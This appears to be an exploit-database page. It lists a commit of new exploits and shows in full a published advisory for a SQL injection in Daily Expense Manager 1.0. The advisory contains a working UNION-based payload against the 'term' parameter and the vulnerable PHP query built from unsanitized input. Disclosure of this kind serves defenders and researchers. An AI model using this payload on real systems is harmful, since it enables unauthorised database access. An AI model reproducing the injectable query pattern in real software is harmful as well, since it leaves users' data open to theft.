034fafa3fd
8 changes to exploits/shellcodes/ghdb Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass Best Student Result Management System v1.0 - Multiple SQLi Daily Expense Manager 1.0 - 'term' SQLi Human Resource Management System v1.0 - Multiple SQLi Open Source Medicine Ordering System v1.0 - SQLi Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload AnyDesk 7.0.15 - Unquoted Service Path
37 lines
No EOL
1.4 KiB
Text
37 lines
No EOL
1.4 KiB
Text
# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
|
|
# Date: February 25th, 2024
|
|
# Exploit Author: Stefan Hesselman
|
|
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
|
|
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
|
|
# Version: 1.0
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
# CWE: CWE-89, CWE-74
|
|
|
|
## Description
|
|
Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker
|
|
can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.
|
|
|
|
## Vulnerable endpoint:
|
|
http://example.com/Daily-Expense-Manager/readxp.php?term=asd
|
|
|
|
## Vulnerable HTTP parameter:
|
|
term (GET)
|
|
|
|
## Exploit proof-of-concept:
|
|
http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-
|
|
|
|
## Vulnerable PHP code:
|
|
File: /Daily-Expense-Manager/readxp.php, Lines: 16-23
|
|
<?php
|
|
[...]
|
|
//get search term
|
|
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.
|
|
//get matched data from skills table
|
|
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
|
|
while ($row = $query->fetch_assoc()) {
|
|
$data[] = $row['pname'];
|
|
}
|
|
//return json data
|
|
echo json_encode($data);
|
|
?> |